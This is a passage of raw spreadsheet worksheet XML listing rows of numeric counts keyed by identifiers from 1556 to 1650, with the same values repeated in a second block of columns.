        <v>17</v>
      </c>
      <c r="H634" s="8">
        <v>463</v>
      </c>
      <c r="K634" s="7">
        <v>1556</v>
      </c>
      <c r="L634" s="8">
        <v>5</v>
      </c>
      <c r="M634" s="8">
        <v>1</v>
      </c>
      <c r="N634" s="8">
        <v>33</v>
      </c>
      <c r="O634" s="8">
        <v>381</v>
      </c>
      <c r="P634" s="8">
        <v>26</v>
      </c>
      <c r="Q634" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="635" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A635" s="7">
        <v>1558</v>
      </c>
      <c r="B635" s="8">
        <v>22</v>
      </c>
      <c r="C635" s="8">
        <v>0</v>
      </c>
      <c r="D635" s="8">
        <v>0</v>
      </c>
      <c r="E635" s="8">
        <v>0</v>
      </c>
      <c r="F635" s="8">
        <v>0</v>
      </c>
      <c r="G635" s="8">
        <v>0</v>
      </c>
      <c r="H635" s="8">
        <v>22</v>
      </c>
      <c r="K635" s="7">
        <v>1558</v>
      </c>
      <c r="L635" s="8">
        <v>22</v>
      </c>
      <c r="M635" s="8">
        <v>0</v>
      </c>
      <c r="N635" s="8">
        <v>0</v>
      </c>
      <c r="O635" s="8">
        <v>0</v>
      </c>
      <c r="P635" s="8">
        <v>0</v>
      </c>
      <c r="Q635" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="636" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A636" s="7">
        <v>1559</v>
      </c>
      <c r="B636" s="8">
        <v>20</v>
      </c>
      <c r="C636" s="8">
        <v>0</v>
      </c>
      <c r="D636" s="8">
        <v>5</v>
      </c>
      <c r="E636" s="8">
        <v>10</v>
      </c>
      <c r="F636" s="8">
        <v>7</v>
      </c>
      <c r="G636" s="8">
        <v>10</v>
      </c>
      <c r="H636" s="8">
        <v>52</v>
      </c>
      <c r="K636" s="7">
        <v>1559</v>
      </c>
      <c r="L636" s="8">
        <v>20</v>
      </c>
      <c r="M636" s="8">
        <v>0</v>
      </c>
      <c r="N636" s="8">
        <v>5</v>
      </c>
      <c r="O636" s="8">
        <v>10</v>
      </c>
      <c r="P636" s="8">
        <v>7</v>
      </c>
      <c r="Q636" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="637" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A637" s="7">
        <v>1565</v>
      </c>
      <c r="B637" s="8">
        <v>6</v>
      </c>
      <c r="C637" s="8">
        <v>1</v>
      </c>
      <c r="D637" s="8">
        <v>42</v>
      </c>
      <c r="E637" s="8">
        <v>11</v>
      </c>
      <c r="F637" s="8">
        <v>5</v>
      </c>
      <c r="G637" s="8">
        <v>3</v>
      </c>
      <c r="H637" s="8">
        <v>68</v>
      </c>
      <c r="K637" s="7">
        <v>1565</v>
      </c>
      <c r="L637" s="8">
        <v>6</v>
      </c>
      <c r="M637" s="8">
        <v>1</v>
      </c>
      <c r="N637" s="8">
        <v>42</v>
      </c>
      <c r="O637" s="8">
        <v>11</v>
      </c>
      <c r="P637" s="8">
        <v>5</v>
      </c>
      <c r="Q637" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="638" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A638" s="7">
        <v>1568</v>
      </c>
      <c r="B638" s="8">
        <v>26</v>
      </c>
      <c r="C638" s="8">
        <v>2</v>
      </c>
      <c r="D638" s="8">
        <v>5</v>
      </c>
      <c r="E638" s="8">
        <v>1</v>
      </c>
      <c r="F638" s="8">
        <v>3</v>
      </c>
      <c r="G638" s="8">
        <v>0</v>
      </c>
      <c r="H638" s="8">
        <v>37</v>
      </c>
      <c r="K638" s="7">
        <v>1568</v>
      </c>
      <c r="L638" s="8">
        <v>26</v>
      </c>
      <c r="M638" s="8">
        <v>2</v>
      </c>
      <c r="N638" s="8">
        <v>5</v>
      </c>
      <c r="O638" s="8">
        <v>1</v>
      </c>
      <c r="P638" s="8">
        <v>3</v>
      </c>
      <c r="Q638" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="639" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A639" s="7">
        <v>1570</v>
      </c>
      <c r="B639" s="8">
        <v>24</v>
      </c>
      <c r="C639" s="8">
        <v>0</v>
      </c>
      <c r="D639" s="8">
        <v>5</v>
      </c>
      <c r="E639" s="8">
        <v>5</v>
      </c>
      <c r="F639" s="8">
        <v>2</v>
      </c>
      <c r="G639" s="8">
        <v>2</v>
      </c>
      <c r="H639" s="8">
        <v>38</v>
      </c>
      <c r="K639" s="7">
        <v>1570</v>
      </c>
      <c r="L639" s="8">
        <v>24</v>
      </c>
      <c r="M639" s="8">
        <v>0</v>
      </c>
      <c r="N639" s="8">
        <v>5</v>
      </c>
      <c r="O639" s="8">
        <v>5</v>
      </c>
      <c r="P639" s="8">
        <v>2</v>
      </c>
      <c r="Q639" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="640" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A640" s="7">
        <v>1571</v>
      </c>
      <c r="B640" s="8">
        <v>26</v>
      </c>
      <c r="C640" s="8">
        <v>0</v>
      </c>
      <c r="D640" s="8">
        <v>0</v>
      </c>
      <c r="E640" s="8">
        <v>0</v>
      </c>
      <c r="F640" s="8">
        <v>1</v>
      </c>
      <c r="G640" s="8">
        <v>5</v>
      </c>
      <c r="H640" s="8">
        <v>32</v>
      </c>
      <c r="K640" s="7">
        <v>1571</v>
      </c>
      <c r="L640" s="8">
        <v>26</v>
      </c>
      <c r="M640" s="8">
        <v>0</v>
      </c>
      <c r="N640" s="8">
        <v>0</v>
      </c>
      <c r="O640" s="8">
        <v>0</v>
      </c>
      <c r="P640" s="8">
        <v>1</v>
      </c>
      <c r="Q640" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="641" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A641" s="7">
        <v>1573</v>
      </c>
      <c r="B641" s="8">
        <v>22</v>
      </c>
      <c r="C641" s="8">
        <v>1</v>
      </c>
      <c r="D641" s="8">
        <v>0</v>
      </c>
      <c r="E641" s="8">
        <v>0</v>
      </c>
      <c r="F641" s="8">
        <v>77</v>
      </c>
      <c r="G641" s="8">
        <v>33</v>
      </c>
      <c r="H641" s="8">
        <v>133</v>
      </c>
      <c r="K641" s="7">
        <v>1573</v>
      </c>
      <c r="L641" s="8">
        <v>22</v>
      </c>
      <c r="M641" s="8">
        <v>1</v>
      </c>
      <c r="N641" s="8">
        <v>0</v>
      </c>
      <c r="O641" s="8">
        <v>0</v>
      </c>
      <c r="P641" s="8">
        <v>77</v>
      </c>
      <c r="Q641" s="8">
        <v>33</v>
      </c>
    </row>
    <row r="642" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A642" s="7">
        <v>1574</v>
      </c>
      <c r="B642" s="8">
        <v>12</v>
      </c>
      <c r="C642" s="8">
        <v>0</v>
      </c>
      <c r="D642" s="8">
        <v>0</v>
      </c>
      <c r="E642" s="8">
        <v>2</v>
      </c>
      <c r="F642" s="8">
        <v>2</v>
      </c>
      <c r="G642" s="8">
        <v>3</v>
      </c>
      <c r="H642" s="8">
        <v>19</v>
      </c>
      <c r="K642" s="7">
        <v>1574</v>
      </c>
      <c r="L642" s="8">
        <v>12</v>
      </c>
      <c r="M642" s="8">
        <v>0</v>
      </c>
      <c r="N642" s="8">
        <v>0</v>
      </c>
      <c r="O642" s="8">
        <v>2</v>
      </c>
      <c r="P642" s="8">
        <v>2</v>
      </c>
      <c r="Q642" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="643" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A643" s="7">
        <v>1581</v>
      </c>
      <c r="B643" s="8">
        <v>26</v>
      </c>
      <c r="C643" s="8">
        <v>1</v>
      </c>
      <c r="D643" s="8">
        <v>4</v>
      </c>
      <c r="E643" s="8">
        <v>0</v>
      </c>
      <c r="F643" s="8">
        <v>4</v>
      </c>
      <c r="G643" s="8">
        <v>1</v>
      </c>
      <c r="H643" s="8">
        <v>36</v>
      </c>
      <c r="K643" s="7">
        <v>1581</v>
      </c>
      <c r="L643" s="8">
        <v>26</v>
      </c>
      <c r="M643" s="8">
        <v>1</v>
      </c>
      <c r="N643" s="8">
        <v>4</v>
      </c>
      <c r="O643" s="8">
        <v>0</v>
      </c>
      <c r="P643" s="8">
        <v>4</v>
      </c>
      <c r="Q643" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="644" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A644" s="7">
        <v>1582</v>
      </c>
      <c r="B644" s="8">
        <v>30</v>
      </c>
      <c r="C644" s="8">
        <v>2</v>
      </c>
      <c r="D644" s="8">
        <v>5</v>
      </c>
      <c r="E644" s="8">
        <v>0</v>
      </c>
      <c r="F644" s="8">
        <v>1</v>
      </c>
      <c r="G644" s="8">
        <v>1</v>
      </c>
      <c r="H644" s="8">
        <v>39</v>
      </c>
      <c r="K644" s="7">
        <v>1582</v>
      </c>
      <c r="L644" s="8">
        <v>30</v>
      </c>
      <c r="M644" s="8">
        <v>2</v>
      </c>
      <c r="N644" s="8">
        <v>5</v>
      </c>
      <c r="O644" s="8">
        <v>0</v>
      </c>
      <c r="P644" s="8">
        <v>1</v>
      </c>
      <c r="Q644" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="645" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A645" s="7">
        <v>1583</v>
      </c>
      <c r="B645" s="8">
        <v>30</v>
      </c>
      <c r="C645" s="8">
        <v>1</v>
      </c>
      <c r="D645" s="8">
        <v>11</v>
      </c>
      <c r="E645" s="8">
        <v>10</v>
      </c>
      <c r="F645" s="8">
        <v>10</v>
      </c>
      <c r="G645" s="8">
        <v>6</v>
      </c>
      <c r="H645" s="8">
        <v>68</v>
      </c>
      <c r="K645" s="7">
        <v>1583</v>
      </c>
      <c r="L645" s="8">
        <v>30</v>
      </c>
      <c r="M645" s="8">
        <v>1</v>
      </c>
      <c r="N645" s="8">
        <v>11</v>
      </c>
      <c r="O645" s="8">
        <v>10</v>
      </c>
      <c r="P645" s="8">
        <v>10</v>
      </c>
      <c r="Q645" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="646" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A646" s="7">
        <v>1589</v>
      </c>
      <c r="B646" s="8">
        <v>21</v>
      </c>
      <c r="C646" s="8">
        <v>1</v>
      </c>
      <c r="D646" s="8">
        <v>0</v>
      </c>
      <c r="E646" s="8">
        <v>0</v>
      </c>
      <c r="F646" s="8">
        <v>8</v>
      </c>
      <c r="G646" s="8">
        <v>5</v>
      </c>
      <c r="H646" s="8">
        <v>35</v>
      </c>
      <c r="K646" s="7">
        <v>1589</v>
      </c>
      <c r="L646" s="8">
        <v>21</v>
      </c>
      <c r="M646" s="8">
        <v>1</v>
      </c>
      <c r="N646" s="8">
        <v>0</v>
      </c>
      <c r="O646" s="8">
        <v>0</v>
      </c>
      <c r="P646" s="8">
        <v>8</v>
      </c>
      <c r="Q646" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="647" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A647" s="7">
        <v>1593</v>
      </c>
      <c r="B647" s="8">
        <v>0</v>
      </c>
      <c r="C647" s="8">
        <v>0</v>
      </c>
      <c r="D647" s="8">
        <v>0</v>
      </c>
      <c r="E647" s="8">
        <v>0</v>
      </c>
      <c r="F647" s="8">
        <v>10</v>
      </c>
      <c r="G647" s="8">
        <v>6</v>
      </c>
      <c r="H647" s="8">
        <v>16</v>
      </c>
      <c r="K647" s="7">
        <v>1593</v>
      </c>
      <c r="L647" s="8">
        <v>0</v>
      </c>
      <c r="M647" s="8">
        <v>0</v>
      </c>
      <c r="N647" s="8">
        <v>0</v>
      </c>
      <c r="O647" s="8">
        <v>0</v>
      </c>
      <c r="P647" s="8">
        <v>10</v>
      </c>
      <c r="Q647" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="648" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A648" s="7">
        <v>1595</v>
      </c>
      <c r="B648" s="8">
        <v>6</v>
      </c>
      <c r="C648" s="8">
        <v>1</v>
      </c>
      <c r="D648" s="8">
        <v>0</v>
      </c>
      <c r="E648" s="8">
        <v>40</v>
      </c>
      <c r="F648" s="8">
        <v>4</v>
      </c>
      <c r="G648" s="8">
        <v>86</v>
      </c>
      <c r="H648" s="8">
        <v>137</v>
      </c>
      <c r="K648" s="7">
        <v>1595</v>
      </c>
      <c r="L648" s="8">
        <v>6</v>
      </c>
      <c r="M648" s="8">
        <v>1</v>
      </c>
      <c r="N648" s="8">
        <v>0</v>
      </c>
      <c r="O648" s="8">
        <v>40</v>
      </c>
      <c r="P648" s="8">
        <v>4</v>
      </c>
      <c r="Q648" s="8">
        <v>86</v>
      </c>
    </row>
    <row r="649" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A649" s="7">
        <v>1597</v>
      </c>
      <c r="B649" s="8">
        <v>26</v>
      </c>
      <c r="C649" s="8">
        <v>1</v>
      </c>
      <c r="D649" s="8">
        <v>0</v>
      </c>
      <c r="E649" s="8">
        <v>0</v>
      </c>
      <c r="F649" s="8">
        <v>19</v>
      </c>
      <c r="G649" s="8">
        <v>53</v>
      </c>
      <c r="H649" s="8">
        <v>99</v>
      </c>
      <c r="K649" s="7">
        <v>1597</v>
      </c>
      <c r="L649" s="8">
        <v>26</v>
      </c>
      <c r="M649" s="8">
        <v>1</v>
      </c>
      <c r="N649" s="8">
        <v>0</v>
      </c>
      <c r="O649" s="8">
        <v>0</v>
      </c>
      <c r="P649" s="8">
        <v>19</v>
      </c>
      <c r="Q649" s="8">
        <v>53</v>
      </c>
    </row>
    <row r="650" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A650" s="7">
        <v>1598</v>
      </c>
      <c r="B650" s="8">
        <v>25</v>
      </c>
      <c r="C650" s="8">
        <v>1</v>
      </c>
      <c r="D650" s="8">
        <v>25</v>
      </c>
      <c r="E650" s="8">
        <v>95</v>
      </c>
      <c r="F650" s="8">
        <v>3</v>
      </c>
      <c r="G650" s="8">
        <v>8</v>
      </c>
      <c r="H650" s="8">
        <v>157</v>
      </c>
      <c r="K650" s="7">
        <v>1598</v>
      </c>
      <c r="L650" s="8">
        <v>25</v>
      </c>
      <c r="M650" s="8">
        <v>1</v>
      </c>
      <c r="N650" s="8">
        <v>25</v>
      </c>
      <c r="O650" s="8">
        <v>95</v>
      </c>
      <c r="P650" s="8">
        <v>3</v>
      </c>
      <c r="Q650" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="651" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A651" s="7">
        <v>1611</v>
      </c>
      <c r="B651" s="8">
        <v>25</v>
      </c>
      <c r="C651" s="8">
        <v>1</v>
      </c>
      <c r="D651" s="8">
        <v>20</v>
      </c>
      <c r="E651" s="8">
        <v>140</v>
      </c>
      <c r="F651" s="8">
        <v>9</v>
      </c>
      <c r="G651" s="8">
        <v>2</v>
      </c>
      <c r="H651" s="8">
        <v>197</v>
      </c>
      <c r="K651" s="7">
        <v>1611</v>
      </c>
      <c r="L651" s="8">
        <v>25</v>
      </c>
      <c r="M651" s="8">
        <v>1</v>
      </c>
      <c r="N651" s="8">
        <v>20</v>
      </c>
      <c r="O651" s="8">
        <v>140</v>
      </c>
      <c r="P651" s="8">
        <v>9</v>
      </c>
      <c r="Q651" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="652" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A652" s="7">
        <v>1612</v>
      </c>
      <c r="B652" s="8">
        <v>24</v>
      </c>
      <c r="C652" s="8">
        <v>2</v>
      </c>
      <c r="D652" s="8">
        <v>2</v>
      </c>
      <c r="E652" s="8">
        <v>0</v>
      </c>
      <c r="F652" s="8">
        <v>12</v>
      </c>
      <c r="G652" s="8">
        <v>8</v>
      </c>
      <c r="H652" s="8">
        <v>48</v>
      </c>
      <c r="K652" s="7">
        <v>1612</v>
      </c>
      <c r="L652" s="8">
        <v>24</v>
      </c>
      <c r="M652" s="8">
        <v>2</v>
      </c>
      <c r="N652" s="8">
        <v>2</v>
      </c>
      <c r="O652" s="8">
        <v>0</v>
      </c>
      <c r="P652" s="8">
        <v>12</v>
      </c>
      <c r="Q652" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="653" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A653" s="7">
        <v>1617</v>
      </c>
      <c r="B653" s="8">
        <v>5</v>
      </c>
      <c r="C653" s="8">
        <v>0</v>
      </c>
      <c r="D653" s="8">
        <v>0</v>
      </c>
      <c r="E653" s="8">
        <v>0</v>
      </c>
      <c r="F653" s="8">
        <v>184</v>
      </c>
      <c r="G653" s="8">
        <v>3</v>
      </c>
      <c r="H653" s="8">
        <v>192</v>
      </c>
      <c r="K653" s="7">
        <v>1617</v>
      </c>
      <c r="L653" s="8">
        <v>5</v>
      </c>
      <c r="M653" s="8">
        <v>0</v>
      </c>
      <c r="N653" s="8">
        <v>0</v>
      </c>
      <c r="O653" s="8">
        <v>0</v>
      </c>
      <c r="P653" s="8">
        <v>184</v>
      </c>
      <c r="Q653" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="654" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A654" s="7">
        <v>1618</v>
      </c>
      <c r="B654" s="8">
        <v>25</v>
      </c>
      <c r="C654" s="8">
        <v>0</v>
      </c>
      <c r="D654" s="8">
        <v>26</v>
      </c>
      <c r="E654" s="8">
        <v>23</v>
      </c>
      <c r="F654" s="8">
        <v>60</v>
      </c>
      <c r="G654" s="8">
        <v>51</v>
      </c>
      <c r="H654" s="8">
        <v>185</v>
      </c>
      <c r="K654" s="7">
        <v>1618</v>
      </c>
      <c r="L654" s="8">
        <v>25</v>
      </c>
      <c r="M654" s="8">
        <v>0</v>
      </c>
      <c r="N654" s="8">
        <v>26</v>
      </c>
      <c r="O654" s="8">
        <v>23</v>
      </c>
      <c r="P654" s="8">
        <v>60</v>
      </c>
      <c r="Q654" s="8">
        <v>51</v>
      </c>
    </row>
    <row r="655" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A655" s="7">
        <v>1619</v>
      </c>
      <c r="B655" s="8">
        <v>26</v>
      </c>
      <c r="C655" s="8">
        <v>1</v>
      </c>
      <c r="D655" s="8">
        <v>0</v>
      </c>
      <c r="E655" s="8">
        <v>0</v>
      </c>
      <c r="F655" s="8">
        <v>9</v>
      </c>
      <c r="G655" s="8">
        <v>1</v>
      </c>
      <c r="H655" s="8">
        <v>37</v>
      </c>
      <c r="K655" s="7">
        <v>1619</v>
      </c>
      <c r="L655" s="8">
        <v>26</v>
      </c>
      <c r="M655" s="8">
        <v>1</v>
      </c>
      <c r="N655" s="8">
        <v>0</v>
      </c>
      <c r="O655" s="8">
        <v>0</v>
      </c>
      <c r="P655" s="8">
        <v>9</v>
      </c>
      <c r="Q655" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="656" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A656" s="7">
        <v>1621</v>
      </c>
      <c r="B656" s="8">
        <v>26</v>
      </c>
      <c r="C656" s="8">
        <v>2</v>
      </c>
      <c r="D656" s="8">
        <v>7</v>
      </c>
      <c r="E656" s="8">
        <v>0</v>
      </c>
      <c r="F656" s="8">
        <v>2</v>
      </c>
      <c r="G656" s="8">
        <v>0</v>
      </c>
      <c r="H656" s="8">
        <v>37</v>
      </c>
      <c r="K656" s="7">
        <v>1621</v>
      </c>
      <c r="L656" s="8">
        <v>26</v>
      </c>
      <c r="M656" s="8">
        <v>2</v>
      </c>
      <c r="N656" s="8">
        <v>7</v>
      </c>
      <c r="O656" s="8">
        <v>0</v>
      </c>
      <c r="P656" s="8">
        <v>2</v>
      </c>
      <c r="Q656" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="657" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A657" s="7">
        <v>1623</v>
      </c>
      <c r="B657" s="8">
        <v>26</v>
      </c>
      <c r="C657" s="8">
        <v>1</v>
      </c>
      <c r="D657" s="8">
        <v>0</v>
      </c>
      <c r="E657" s="8">
        <v>0</v>
      </c>
      <c r="F657" s="8">
        <v>74</v>
      </c>
      <c r="G657" s="8">
        <v>54</v>
      </c>
      <c r="H657" s="8">
        <v>155</v>
      </c>
      <c r="K657" s="7">
        <v>1623</v>
      </c>
      <c r="L657" s="8">
        <v>26</v>
      </c>
      <c r="M657" s="8">
        <v>1</v>
      </c>
      <c r="N657" s="8">
        <v>0</v>
      </c>
      <c r="O657" s="8">
        <v>0</v>
      </c>
      <c r="P657" s="8">
        <v>74</v>
      </c>
      <c r="Q657" s="8">
        <v>54</v>
      </c>
    </row>
    <row r="658" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A658" s="7">
        <v>1627</v>
      </c>
      <c r="B658" s="8">
        <v>26</v>
      </c>
      <c r="C658" s="8">
        <v>2</v>
      </c>
      <c r="D658" s="8">
        <v>0</v>
      </c>
      <c r="E658" s="8">
        <v>0</v>
      </c>
      <c r="F658" s="8">
        <v>22</v>
      </c>
      <c r="G658" s="8">
        <v>22</v>
      </c>
      <c r="H658" s="8">
        <v>72</v>
      </c>
      <c r="K658" s="7">
        <v>1627</v>
      </c>
      <c r="L658" s="8">
        <v>26</v>
      </c>
      <c r="M658" s="8">
        <v>2</v>
      </c>
      <c r="N658" s="8">
        <v>0</v>
      </c>
      <c r="O658" s="8">
        <v>0</v>
      </c>
      <c r="P658" s="8">
        <v>22</v>
      </c>
      <c r="Q658" s="8">
        <v>22</v>
      </c>
    </row>
    <row r="659" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A659" s="7">
        <v>1628</v>
      </c>
      <c r="B659" s="8">
        <v>20</v>
      </c>
      <c r="C659" s="8">
        <v>1</v>
      </c>
      <c r="D659" s="8">
        <v>45</v>
      </c>
      <c r="E659" s="8">
        <v>11</v>
      </c>
      <c r="F659" s="8">
        <v>11</v>
      </c>
      <c r="G659" s="8">
        <v>4</v>
      </c>
      <c r="H659" s="8">
        <v>92</v>
      </c>
      <c r="K659" s="7">
        <v>1628</v>
      </c>
      <c r="L659" s="8">
        <v>20</v>
      </c>
      <c r="M659" s="8">
        <v>1</v>
      </c>
      <c r="N659" s="8">
        <v>45</v>
      </c>
      <c r="O659" s="8">
        <v>11</v>
      </c>
      <c r="P659" s="8">
        <v>11</v>
      </c>
      <c r="Q659" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="660" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A660" s="7">
        <v>1634</v>
      </c>
      <c r="B660" s="8">
        <v>0</v>
      </c>
      <c r="C660" s="8">
        <v>0</v>
      </c>
      <c r="D660" s="8">
        <v>2</v>
      </c>
      <c r="E660" s="8">
        <v>5</v>
      </c>
      <c r="F660" s="8">
        <v>2</v>
      </c>
      <c r="G660" s="8">
        <v>1</v>
      </c>
      <c r="H660" s="8">
        <v>10</v>
      </c>
      <c r="K660" s="7">
        <v>1634</v>
      </c>
      <c r="L660" s="8">
        <v>0</v>
      </c>
      <c r="M660" s="8">
        <v>0</v>
      </c>
      <c r="N660" s="8">
        <v>2</v>
      </c>
      <c r="O660" s="8">
        <v>5</v>
      </c>
      <c r="P660" s="8">
        <v>2</v>
      </c>
      <c r="Q660" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="661" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A661" s="7">
        <v>1637</v>
      </c>
      <c r="B661" s="8">
        <v>24</v>
      </c>
      <c r="C661" s="8">
        <v>2</v>
      </c>
      <c r="D661" s="8">
        <v>0</v>
      </c>
      <c r="E661" s="8">
        <v>0</v>
      </c>
      <c r="F661" s="8">
        <v>15</v>
      </c>
      <c r="G661" s="8">
        <v>4</v>
      </c>
      <c r="H661" s="8">
        <v>45</v>
      </c>
      <c r="K661" s="7">
        <v>1637</v>
      </c>
      <c r="L661" s="8">
        <v>24</v>
      </c>
      <c r="M661" s="8">
        <v>2</v>
      </c>
      <c r="N661" s="8">
        <v>0</v>
      </c>
      <c r="O661" s="8">
        <v>0</v>
      </c>
      <c r="P661" s="8">
        <v>15</v>
      </c>
      <c r="Q661" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="662" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A662" s="7">
        <v>1638</v>
      </c>
      <c r="B662" s="8">
        <v>50</v>
      </c>
      <c r="C662" s="8">
        <v>1</v>
      </c>
      <c r="D662" s="8">
        <v>373</v>
      </c>
      <c r="E662" s="8">
        <v>137</v>
      </c>
      <c r="F662" s="8">
        <v>11</v>
      </c>
      <c r="G662" s="8">
        <v>17</v>
      </c>
      <c r="H662" s="8">
        <v>589</v>
      </c>
      <c r="K662" s="7">
        <v>1638</v>
      </c>
      <c r="L662" s="8">
        <v>50</v>
      </c>
      <c r="M662" s="8">
        <v>1</v>
      </c>
      <c r="N662" s="8">
        <v>373</v>
      </c>
      <c r="O662" s="8">
        <v>137</v>
      </c>
      <c r="P662" s="8">
        <v>11</v>
      </c>
      <c r="Q662" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="663" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A663" s="7">
        <v>1639</v>
      </c>
      <c r="B663" s="8">
        <v>0</v>
      </c>
      <c r="C663" s="8">
        <v>0</v>
      </c>
      <c r="D663" s="8">
        <v>0</v>
      </c>
      <c r="E663" s="8">
        <v>2</v>
      </c>
      <c r="F663" s="8">
        <v>34</v>
      </c>
      <c r="G663" s="8">
        <v>44</v>
      </c>
      <c r="H663" s="8">
        <v>80</v>
      </c>
      <c r="K663" s="7">
        <v>1639</v>
      </c>
      <c r="L663" s="8">
        <v>0</v>
      </c>
      <c r="M663" s="8">
        <v>0</v>
      </c>
      <c r="N663" s="8">
        <v>0</v>
      </c>
      <c r="O663" s="8">
        <v>2</v>
      </c>
      <c r="P663" s="8">
        <v>34</v>
      </c>
      <c r="Q663" s="8">
        <v>44</v>
      </c>
    </row>
    <row r="664" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A664" s="7">
        <v>1640</v>
      </c>
      <c r="B664" s="8">
        <v>20</v>
      </c>
      <c r="C664" s="8">
        <v>1</v>
      </c>
      <c r="D664" s="8">
        <v>2</v>
      </c>
      <c r="E664" s="8">
        <v>0</v>
      </c>
      <c r="F664" s="8">
        <v>1</v>
      </c>
      <c r="G664" s="8">
        <v>1</v>
      </c>
      <c r="H664" s="8">
        <v>25</v>
      </c>
      <c r="K664" s="7">
        <v>1640</v>
      </c>
      <c r="L664" s="8">
        <v>20</v>
      </c>
      <c r="M664" s="8">
        <v>1</v>
      </c>
      <c r="N664" s="8">
        <v>2</v>
      </c>
      <c r="O664" s="8">
        <v>0</v>
      </c>
      <c r="P664" s="8">
        <v>1</v>
      </c>
      <c r="Q664" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="665" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A665" s="7">
        <v>1641</v>
      </c>
      <c r="B665" s="8">
        <v>20</v>
      </c>
      <c r="C665" s="8">
        <v>1</v>
      </c>
      <c r="D665" s="8">
        <v>5</v>
      </c>
      <c r="E665" s="8">
        <v>5</v>
      </c>
      <c r="F665" s="8">
        <v>6</v>
      </c>
      <c r="G665" s="8">
        <v>5</v>
      </c>
      <c r="H665" s="8">
        <v>42</v>
      </c>
      <c r="K665" s="7">
        <v>1641</v>
      </c>
      <c r="L665" s="8">
        <v>20</v>
      </c>
      <c r="M665" s="8">
        <v>1</v>
      </c>
      <c r="N665" s="8">
        <v>5</v>
      </c>
      <c r="O665" s="8">
        <v>5</v>
      </c>
      <c r="P665" s="8">
        <v>6</v>
      </c>
      <c r="Q665" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="666" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A666" s="7">
        <v>1644</v>
      </c>
      <c r="B666" s="8">
        <v>28</v>
      </c>
      <c r="C666" s="8">
        <v>0</v>
      </c>
      <c r="D666" s="8">
        <v>4</v>
      </c>
      <c r="E666" s="8">
        <v>0</v>
      </c>
      <c r="F666" s="8">
        <v>3</v>
      </c>
      <c r="G666" s="8">
        <v>0</v>
      </c>
      <c r="H666" s="8">
        <v>35</v>
      </c>
      <c r="K666" s="7">
        <v>1644</v>
      </c>
      <c r="L666" s="8">
        <v>28</v>
      </c>
      <c r="M666" s="8">
        <v>0</v>
      </c>
      <c r="N666" s="8">
        <v>4</v>
      </c>
      <c r="O666" s="8">
        <v>0</v>
      </c>
      <c r="P666" s="8">
        <v>3</v>
      </c>
      <c r="Q666" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="667" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A667" s="7">
        <v>1647</v>
      </c>
      <c r="B667" s="8">
        <v>26</v>
      </c>
      <c r="C667" s="8">
        <v>0</v>
      </c>
      <c r="D667" s="8">
        <v>0</v>
      </c>
      <c r="E667" s="8">
        <v>0</v>
      </c>
      <c r="F667" s="8">
        <v>18</v>
      </c>
      <c r="G667" s="8">
        <v>30</v>
      </c>
      <c r="H667" s="8">
        <v>74</v>
      </c>
      <c r="K667" s="7">
        <v>1647</v>
      </c>
      <c r="L667" s="8">
        <v>26</v>
      </c>
      <c r="M667" s="8">
        <v>0</v>
      </c>
      <c r="N667" s="8">
        <v>0</v>
      </c>
      <c r="O667" s="8">
        <v>0</v>
      </c>
      <c r="P667" s="8">
        <v>18</v>
      </c>
      <c r="Q667" s="8">
        <v>30</v>
      </c>
    </row>
    <row r="668" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A668" s="7">
        <v>1650</v>
      </c>
      <c r="B668" s="8">
        <v>24</v>
      </c>
      <c r="C668" s="8">
        <v>1</v>
      </c>
      <c r="D668" s="8">
        <v>10</v>
      </c>
